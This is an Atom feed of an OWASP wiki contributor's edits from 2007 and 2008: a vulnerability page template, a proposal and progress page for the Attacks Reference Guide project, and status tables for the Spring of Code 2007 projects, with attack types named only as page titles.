https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=NsravOWASP - User contributions [en]2026-04-17T17:28:45ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=Vulnerability_template&diff=24798Vulnerability template2008-01-28T20:33:40Z<p>Nsrav: New page: ==Description== PS: in case of a "Exposure Period" section exists, it should be placed on this section as a subsection. Ex:<nowiki>===Exposure Period===</nowiki> ==Examples == ===Examp...</p>
<hr />
<div>==Description==<br />
<br />
PS: in case of a "Exposure Period" section exists, it should be placed on this section as a subsection.<br />
Ex:<nowiki>===Exposure Period===</nowiki><br />
<br />
<br />
==Examples ==<br />
<br />
===Example 1===<br />
<br />
<br />
===Example n===<br />
<br />
<br />
==Likelihood of exploitation ==<br />
<br />
<br />
==Technical Impacts==<br />
<br />
<br />
==Related Vulnerabilities==<br />
PS: "Related Problems" sections should be placed on this section<br />
<br />
<br />
==Related Attacks==<br />
<br />
<br />
==Related Threats Agents==<br />
<br />
<br />
==Related Countermeasures==<br />
<br />
<br />
==References==<br />
<br />
<br />
<nowiki>[[Category:XYZ]]</nowiki><br />
<nowiki>[[Category:XPTO]]</nowiki></div>Nsravhttps://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide&diff=24784SpoC 007 - Attacks Reference Guide2008-01-28T18:33:39Z<p>Nsrav: </p>
<hr />
<div>'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''<br />
<br />
<br />
'''AoC Candidate''': NSRAV Security R&D<br />
<br />
'''Project coordinator''': Dinis Cruz<br />
<br />
'''Project Progress''': 100% Complete, [[SpoC 007 - Attacks Reference Guide - Progress Page|Progress Page]]<br />
<br />
== Leonardo Cavallari & Matteo Nava - NSRAV Security R&D - Attacks Reference Guide ==<br />
<br />
<br />
=== Introduction ===<br />
<br />
Leonardo Cavallari & Matteo Nava are security specialists of [http://www.evaltec.com.br E-VAL Technologies] and coordinators of [http://nsrav.lsi.usp.br/ NSRAV], a security research center located at [http://www2.usp.br/portugues/index.usp University of Sao Paulo] Brazil, with more than 10 years on the information security field. The team is formed by PhDs, MSc, graduate and post-graduate students and security specialists with GIAC/SANS and CISSP certifications.<br />
<br />
The team develops research and consulting activities in almost every field of information security, focused on EHT, Web applications, IDS/IPS and detection techniques, grid security, among others.<br />
<br />
=== Our Expectations ===<br />
<br />
We recently started contributing to OWASP and we are developing a Portuguese translated version of Testing guide v2 in order to spread it out to the ones who has potential language barrier.<br />
<br />
The maintenance of attacks and vulnerability information is very close to our activities. We believe that we have the specific knowledge and expertise to develop this project. <br />
<br />
=== Executive Summary ===<br />
<br />
We are proposing that we will research about new types of attacks and techniques that aim to Web application/server and report all details about each one. We are intended to explain in details each attack, classify by severity, likelihood of exploitation and impact (when possible), cite references and means of circumvent.<br />
<br />
The present OWASP Attacks reference guide lists a great quantity of attacks, but lots of them are lacking explanation and references. For instances, [http://www.owasp.org/index.php/SQL_Injection SQL Injection] is completely referenced, while [http://www.owasp.org/index.php/Format_string_attack Format string] has only the topics but no description at all.<br />
<br />
Also, we plan to categorize the attacks according to testing guide categories, in order to give a better view of the attacks related to certain test category.<br />
<br />
We believe that the Attack reference guide is very important to OWASP since it describes theoretical and practical all the threats a Web application can be susceptible, it gives the reason for OWASP existence.<br />
<br />
The vulnerability reference guide is important as well and we will be constantly contributing to maintain it up to date, since it misses lots of information and references on the items. Also, it has almost 600 vulnerabilities and we are quite sure that there are some redundant or even out-of-date items. <br />
<br />
=== Specific activities ===<br />
<br />
As long we will be participating as a group, the activities will be divided as following steps:<br />
<br />
* Identify all existent attacks at OWASP site.<br />
* Research new attacks and techniques<br />
* Create test scenarios and exploitation, in order to acquire evidences to be published (when needed)<br />
* Detail and reference each attacks, with most known and reliable sources. <br />
<br />
=== Long-Term Vision for the Project ===<br />
<br />
We expect that with a worldwide contribution, the Attack and Honeycomb project can become the most complete and updated security reference available. Also, we expect to create cross-reference among OWASP documents, using the same concepts, definitions, and categories in order to inter-link all the documents.<br />
<br />
<br />
'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''</div>Nsravhttps://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&diff=24778OWASP Spring Of Code 2007 - Projects2008-01-28T18:19:44Z<p>Nsrav: </p>
<hr />
<div>== All SpoC Projects ==<br />
<br />
This page contains the latest information about the status of the [[OWASP Spring Of Code 2007]] projects (and links to each project's SpoC page)<br />
<br />
'''FINISHED PROJECTS'''<br />
{| class="wikitable" WIDTH=100%<br />
|-<br />
! SpoC Project Name<br />
! Author<br />
! Confirmed<br />
! Status<br />
! Coordinated by <br />
|-<br />
<br />
|-<br />
! [[SpoC 007 - SqlMap|SqlMap]]<br />
| Bernardo Damele<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]<br />
| Leonardo Cavallari and Matteo Nava<br />
NSRAV Security Research Group<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]<br />
| Eric Sheridan and <br />
Dr. Goran Trajkovski<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Code review Project|Code review Project]]<br />
| Eoin Keary<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]<br />
| Sebastien Deleersnyder<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]<br />
| Erwin Geirnaert<br />
| Yes<br />
| '''Project Finished'''<br />
| Jeff Williams<br />
<br />
|-<br />
! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]<br />
| Zalivin Denis<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]<br />
| Przemyslaw 'rezos' Skowron<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]<br />
| Heiko Webers<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]<br />
| Arturo (Buanzo) Busleiman<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]<br />
| Erwin Geirnaert<br />
| Yes<br />
| '''Project Finished'''<br />
| Jeff Williams<br />
<br />
|-<br />
! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]<br />
| Andy Gocke<br />
| Yes<br />
| '''Project Finished'''<br />
| Jeff Williams<br />
<br />
|-<br />
! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]<br />
| Paulo Coimbra<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]<br />
| Arshan Dabirsiaghi<br />
| Yes<br />
|'''Project Finished'''<br />
| Jeff Williams<br />
<br />
|-<br />
! [[SpoC 007 - Inspekt|Inspekt: Input filtering and validation library for PHP]]<br />
| Ed Finkler<br />
| Yes<br />
| Not reviewed progress: '''100%''' <br />
'''Waiting for final review'''<br />
| Andrew v d Stock <br />
<br />
|-<br />
! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]<br />
| Paolo Perego<br />
| Yes<br />
| Half term review: '''done'''<br />
Not reviewed progress: '''100%''' <br />
'''Waiting for final review'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]<br />
| Joshua Perrymon<br />
| Yes<br />
| Not reviewed progress: '''100%''' <br />
'''Waiting for final review'''<br />
| Eoin Keary/<br />
Dinis Cruz<br />
|}<br />
<br />
'''AGREED EXTENSION PROJECTS''' <br />
{| class="wikitable" WIDTH=100%<br />
|-<br />
! SpoC Project Name<br />
! Author<br />
! Confirmed<br />
! Status<br />
! Coordinated by <br />
|-<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]<br />
| Boris Maletic and<br />
Mike de Libero<br />
| Yes<br />
| Not reviewed progress: '''20%<br />
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]''' <br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Corporate Application Security Rating Guide|OWASP Corporate Application Security Rating Guide]]<br />
| Erwin Geirnaert <br />
| Yes<br />
| 20% <br />
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''<br />
| Mandeep Khera <br />
<br />
|-<br />
! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]<br />
| Mark Curphey<br />
| Yes<br />
| Half term review: '''done'''<br />
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''<br />
| OWASP Board<br />
<br />
|-<br />
! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]<br />
| Subere<br />
| Yes<br />
| Half term review: '''done'''<br />
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''<br />
| Dinis Cruz<br />
|}<br />
<br />
'''CLOSED PROJECTS - Partially completed'''<br />
{| class="wikitable" WIDTH=100%<br />
|-<br />
! SpoC Project Name<br />
! Author<br />
! Confirmed<br />
! Status<br />
! Coordinated by <br />
|-<br />
<br />
|-<br />
! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]<br />
| Bunyamin Demir<br />
| Yes<br />
| Not reviewed progress: '''40%'''<br />
'''Project Closed'''/Partially completed<br />
| Ivan Ristic <br />
<br />
|-<br />
! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]<br />
| Josh Sweeney<br />
| Yes<br />
| Reviewed progress: '''30%'''<br />
'''Project Closed'''/Partially completed<br />
| Eoin Keary<br />
|}<br />
<br />
'''CANCELLED PROJECTS'''<br />
{| class="wikitable" WIDTH=100%<br />
|-<br />
! SpoC Project Name<br />
! Author<br />
! Confirmed<br />
! Status<br />
! Coordinated by <br />
|-<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]<br />
| Matteo Meucci<br />
| No<br />
| Not reviewed progress: 0% <br />
'''Project Cancelled'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]<br />
| Keith Casey<br />
| No<br />
| Not reviewed progress: 0%<br />
'''Project Cancelled''' <br />
|<br />
<br />
|-<br />
! [[SpoC 007 - Best Practices & Countermeasures|Best Practices & Countermeasures]]<br />
| Jim<br />
| No<br />
| Not reviewed progress: 0% <br />
'''Project Cancelled''' <br />
| <br />
<br />
|-<br />
! [[SpoC 007 - OWASP Brand|OWASP brand]]<br />
| Paulo Coimbra<br />
| No<br />
| Not reviewed progress: 0% <br />
'''Project Cancelled''' <br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]<br />
| Darren Edmonds<br />
| No<br />
| Not reviewed progress: 0% <br />
'''Project Cancelled'''<br />
| Jeff Williams<br />
|}</div>Nsravhttps://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&diff=24777OWASP Spring Of Code 2007 - Projects2008-01-28T18:19:16Z<p>Nsrav: </p>
<hr />
<div>== All SpoC Projects ==<br />
<br />
This page contains the latest information about the status of the [[OWASP Spring Of Code 2007]] projects (and links to each project's SpoC page)<br />
<br />
'''FINISHED PROJECTS'''<br />
{| class="wikitable" WIDTH=100%<br />
|-<br />
! SpoC Project Name<br />
! Author<br />
! Confirmed<br />
! Status<br />
! Coordinated by <br />
|-<br />
<br />
|-<br />
! [[SpoC 007 - SqlMap|SqlMap]]<br />
| Bernardo Damele<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]<br />
| Leonardo Cavallari and Matteo Nava - NSRAV Security Research Group<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]<br />
| Eric Sheridan and <br />
Dr. Goran Trajkovski<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Code review Project|Code review Project]]<br />
| Eoin Keary<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]<br />
| Sebastien Deleersnyder<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]<br />
| Erwin Geirnaert<br />
| Yes<br />
| '''Project Finished'''<br />
| Jeff Williams<br />
<br />
|-<br />
! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]<br />
| Zalivin Denis<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]<br />
| Przemyslaw 'rezos' Skowron<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]<br />
| Heiko Webers<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]<br />
| Arturo (Buanzo) Busleiman<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]<br />
| Erwin Geirnaert<br />
| Yes<br />
| '''Project Finished'''<br />
| Jeff Williams<br />
<br />
|-<br />
! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]<br />
| Andy Gocke<br />
| Yes<br />
| '''Project Finished'''<br />
| Jeff Williams<br />
<br />
|-<br />
! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]<br />
| Paulo Coimbra<br />
| Yes<br />
| '''Project Finished'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]<br />
| Arshan Dabirsiaghi<br />
| Yes<br />
|'''Project Finished'''<br />
| Jeff Williams<br />
<br />
|-<br />
! [[SpoC 007 - Inspekt|Inspekt: Input filtering and validation library for PHP]]<br />
| Ed Finkler<br />
| Yes<br />
| Not reviewed progress: '''100%''' <br />
'''Waiting for final review'''<br />
| Andrew v d Stock <br />
<br />
|-<br />
! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]<br />
| Paolo Perego<br />
| Yes<br />
| Half term review: '''done'''<br />
Not reviewed progress: '''100%''' <br />
'''Waiting for final review'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]<br />
| Joshua Perrymon<br />
| Yes<br />
| Not reviewed progress: '''100%''' <br />
'''Waiting for final review'''<br />
| Eoin Keary/<br />
Dinis Cruz<br />
|}<br />
<br />
'''AGREED EXTENSION PROJECTS''' <br />
{| class="wikitable" WIDTH=100%<br />
|-<br />
! SpoC Project Name<br />
! Author<br />
! Confirmed<br />
! Status<br />
! Coordinated by <br />
|-<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]<br />
| Boris Maletic and<br />
Mike de Libero<br />
| Yes<br />
| Not reviewed progress: '''20%<br />
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]''' <br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Corporate Application Security Rating Guide|OWASP Corporate Application Security Rating Guide]]<br />
| Erwin Geirnaert <br />
| Yes<br />
| 20% <br />
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''<br />
| Mandeep Khera <br />
<br />
|-<br />
! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]<br />
| Mark Curphey<br />
| Yes<br />
| Half term review: '''done'''<br />
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''<br />
| OWASP Board<br />
<br />
|-<br />
! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]<br />
| Subere<br />
| Yes<br />
| Half term review: '''done'''<br />
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''<br />
| Dinis Cruz<br />
|}<br />
<br />
'''CLOSED PROJECTS - Partially completed'''<br />
{| class="wikitable" WIDTH=100%<br />
|-<br />
! SpoC Project Name<br />
! Author<br />
! Confirmed<br />
! Status<br />
! Coordinated by <br />
|-<br />
<br />
|-<br />
! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]<br />
| Bunyamin Demir<br />
| Yes<br />
| Not reviewed progress: '''40%'''<br />
'''Project Closed'''/Partially completed<br />
| Ivan Ristic <br />
<br />
|-<br />
! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]<br />
| Josh Sweeney<br />
| Yes<br />
| Reviewed progress: '''30%'''<br />
'''Project Closed'''/Partially completed<br />
| Eoin Keary<br />
|}<br />
<br />
'''CANCELLED PROJECTS'''<br />
{| class="wikitable" WIDTH=100%<br />
|-<br />
! SpoC Project Name<br />
! Author<br />
! Confirmed<br />
! Status<br />
! Coordinated by <br />
|-<br />
<br />
|-<br />
! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]<br />
| Matteo Meucci<br />
| No<br />
| Not reviewed progress: 0% <br />
'''Project Cancelled'''<br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]<br />
| Keith Casey<br />
| No<br />
| Not reviewed progress: 0%<br />
'''Project Cancelled''' <br />
|<br />
<br />
|-<br />
! [[SpoC 007 - Best Practices & Countermeasures|Best Practices & Countermeasures]]<br />
| Jim<br />
| No<br />
| Not reviewed progress: 0% <br />
'''Project Cancelled''' <br />
| <br />
<br />
|-<br />
! [[SpoC 007 - OWASP Brand|OWASP brand]]<br />
| Paulo Coimbra<br />
| No<br />
| Not reviewed progress: 0% <br />
'''Project Cancelled''' <br />
| Dinis Cruz<br />
<br />
|-<br />
! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]<br />
| Darren Edmonds<br />
| No<br />
| Not reviewed progress: 0% <br />
'''Project Cancelled'''<br />
| Jeff Williams<br />
|}</div>Nsravhttps://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&diff=23148SpoC 007 - Attacks Reference Guide - Progress Page2007-11-06T13:06:00Z<p>Nsrav: </p>
<hr />
<div>[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] <br />
<br />
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]<br />
<br />
<br />
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:<br />
<br />
# Attack list revision and description (60% of the project)<br />
# Attacks categorization (20% of the project)<br />
# Research and describe new attacks (20% of the project)<br />
<br />
Total project status: '''100% Done!'''<br />
<br />
== CheckPoints and Decision ==<br />
<br />
===Phase 1 - 100% DONE ===<br />
* Attack List Revision: '''Done!'''<br />
Total number of items on the Attack Guide: '''91'''!<br />
<br />
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.<br />
<br />
Items considered to removal from the attack list: '''30 items''', as follows:<br />
<br />
**[[API_Abuse]]<br />
**[[Cross_Site_Scripting]]<br />
**[[Cross-Site_Scripting]]<br />
**[[CSRF]]<br />
**[[Internal_software_developer]]<br />
**[[Interpreter_Injection]]<br />
**[[Link_Following]]<br />
**[[Log_forging]]<br />
**[[Logic/time_bomb]]<br />
**[[Macro_symbol]]<br />
**[[Network_amplification]]<br />
**[[One-Click_Attack]]<br />
**[[OS_Injection]]<br />
**[[OS_Command_Injection]]<br />
**[[PRNG_permanent_compromise_attack]]<br />
**[[Reviewing_Code_for_OS_Injection]]<br />
**[[Script_in_IMG_tags]]<br />
**[[Sniffing_application_traffic_attack]]<br />
**[[Template:Attack]]<br />
**[[Unquoted_Search_Path_or_Element]]<br />
**[[Web_problems]]<br />
**[[Wildcard_or_Matching_Element]]<br />
**[[Windows_::DATA_alternate_data_stream]]<br />
**[[Windows_hard_link]]<br />
**[[Windows_MS-DOS_device_names]]<br />
**[[Windows_Path_Link_problems]]<br />
**[[Windows_Shortcut_Following_%28.LNK%29]]<br />
**[[Windows_Virtual_File_problems]]<br />
**[[XSS_Attacks]]<br />
**[[XSRF]]<br />
<br />
* Attacks Description: '''61 of 61 items done'''!<br />
<br />
===Phase 2 - DONE! ===<br />
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. <br />
<br />
The categories defined are:<br />
* [[:Category:Abuse of Functionality]]<br />
* [[:Category:Spoofing]]<br />
* [[:Category:Probabilistic Techniques]]<br />
* [[:Category:Exploitation of Authentication]]<br />
* [[:Category:Resource Depletion]]<br />
* Exploitation of Privilege/Trust<br />
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)<br />
* [[:Category:Data_Structure_Attacks]]<br />
* Data Leakage Attacks<br />
* [[:Category:Resource Manipulation]]<br />
* [[:Category:Protocol Manipulation]]<br />
* Time and State Attacks<br />
<br />
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.<br />
<br />
===Phase 3 - 100% DONE ===<br />
Research and Description of new attacks:<br />
<br />
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]<br />
** [[Buffer_Overflow_via_Environment_Variables]]<br />
** [[Cross_Frame_Scripting]]<br />
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].<br />
** [[Embedding_Null_Code]]<br />
** [[Man-in-the-browser_attack]]<br />
** [[Manipulating_User_Permission_Identifier]]<br />
** [[Overflow_Binary_Resource_File]]<br />
** [[Session_Prediction]]<br />
<br />
=== Work Done ===<br />
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file<br />
<br />
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).<br />
<br />
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&diff=23056&oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&action=history history])<br />
<br />
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&diff=23057&oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&action=history history])<br />
<br />
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&diff=23058&oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&action=history history])<br />
<br />
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&diff=23060&oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&action=history history])<br />
<br />
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&diff=23065&oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&action=history history])<br />
<br />
* [[HTTP_Response_Splitting]] - ([http://www.owasp.org/index.php?title=HTTP_Response_Splitting&diff=23117&oldid=7948 diff] , [http://www.owasp.org/index.php?title=HTTP_Response_Splitting&action=history history])<br />
<br />
* [[HTTP_Request_Smuggling]] - ([http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&diff=23118&oldid=5802 diff], [http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&action=history history])<br />
<br />
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&diff=23067&oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&action=history history])<br />
<br />
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23075&oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&action=history history])<br />
<br />
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&diff=23077&oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&action=history history history])<br />
<br />
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&diff=23079&oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&action=history history])<br />
<br />
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&diff=23082&oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&action=history history])<br />
<br />
* [[Network_Eavesdropping]] - ([http://www.owasp.org/index.php?title=Network_Eavesdropping&diff=23146&oldid=7395 diff] , [http://www.owasp.org/index.php?title=Network_Eavesdropping&action=history history])<br />
<br />
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&diff=23084&oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&action=history history])<br />
<br />
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&diff=23059&oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&action=history history])<br />
<br />
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&diff=23066&oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&action=history history])<br />
<br />
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&diff=23071&oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&action=history history])<br />
<br />
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&diff=23076&oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&action=history history])<br />
<br />
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&diff=23078&oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&action=history history])<br />
<br />
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&diff=23081&oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&action=history history])<br />
<br />
* [[Session_fixation]] - ([http://www.owasp.org/index.php?title=Session_fixation&diff=23144&oldid=7391 diff] , [http://www.owasp.org/index.php?title=Session_fixation&action=history history])<br />
<br />
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&diff=23086&oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&action=history history])<br />
<br />
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&diff=23088&oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&action=history history])<br />
<br />
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&diff=23089&oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&action=history history])<br />
<br />
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&diff=23090&oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&action=history history])<br />
<br />
* [[SQL_Injection]] - ([http://www.owasp.org/index.php?title=SQL_Injection&diff=23119&oldid=21964 diff] , [http://www.owasp.org/index.php?title=SQL_Injection&action=history history])<br />
<br />
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&diff=23109&oldid=7392 diff] , [http://www.owasp.org/index.php?title=Traffic_flood&action=history history])<br />
<br />
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&diff=23093&oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&action=history history])<br />
<br />
